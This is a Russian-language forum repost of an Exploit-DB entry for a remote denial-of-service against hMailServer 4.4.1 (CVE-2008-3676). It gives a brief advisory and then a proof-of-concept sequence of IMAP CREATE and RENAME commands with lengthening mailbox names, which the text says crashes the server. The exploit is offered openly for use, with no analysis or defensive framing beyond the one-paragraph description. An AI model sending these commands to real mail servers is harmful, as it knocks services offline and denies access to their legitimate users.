Exploit hMAilServer 4.4.1 - IMAP Command Remote Denial of Service

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
32229
Проверка EDB
  1. Пройдено
Автор
ANTUNES
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-3676
Дата публикации
2008-08-12
Код:
source: https://www.securityfocus.com/bid/30663/info

hMailServer is prone to a remote denial-of-service vulnerability caused by large numbers of certain IMAP commands.

Exploiting this issue will cause the server to crash and deny access to legitimate users.

hMailServer 4.4.1 is vulnerable; other versions may also be affected.

A01 CREATE AAAAA
A02 CREATE AAAAAA
A03 CREATE AAAAAAA
...
A97 RENAME AAAAA BBBBB
A98 RENAME AAAAAA BBBBBB
A100 RENAME AAAAAAA BBBBBBB
 
Источник
www.exploit-db.com

Похожие темы